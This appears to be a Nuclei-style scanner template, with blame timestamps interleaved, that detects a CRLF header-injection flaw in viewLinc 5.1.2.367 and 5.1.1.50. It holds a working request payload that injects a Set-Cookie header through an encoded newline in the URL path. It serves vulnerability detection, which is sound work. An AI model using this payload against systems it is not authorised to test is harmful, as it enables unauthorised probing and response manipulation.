2021-03-15 20:00:56 +00:00
id : viewlinc-crlf-injection
info :
2022-08-05 13:57:51 +00:00
name : viewLinc 5.1.2.367 - Carriage Return Line Feed Attack
2021-03-15 20:00:56 +00:00
author : geeknik
severity : low
2022-08-05 13:57:51 +00:00
description : viewLinc 5.1.2.367 (and sometimes 5.1.1.50) allows remote attackers to inject a carriage return line feed (CRLF) character into the responses returned by the product, which allows attackers to inject arbitrary HTTP headers into the response returned.
2022-04-22 10:38:41 +00:00
reference :
- https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
2021-03-16 08:35:20 +00:00
tags : crlf,viewlinc
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-03-15 20:00:56 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-03-15 20:00:56 +00:00
- method : GET
path :
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
matchers-condition : or
matchers :
- type : word
words :
- "Server: viewLinc/5.1.2.367"
- "Set-Cookie: crlfinjection=crlfinjection"
part : header
condition : and
- type : word
words :
- "Server: viewLinc/5.1.1.50"
- "Set-Cookie: crlfinjection=crlfinjection"
part : header
condition : and
2022-08-05 13:57:51 +00:00
2023-07-05 08:07:58 +00:00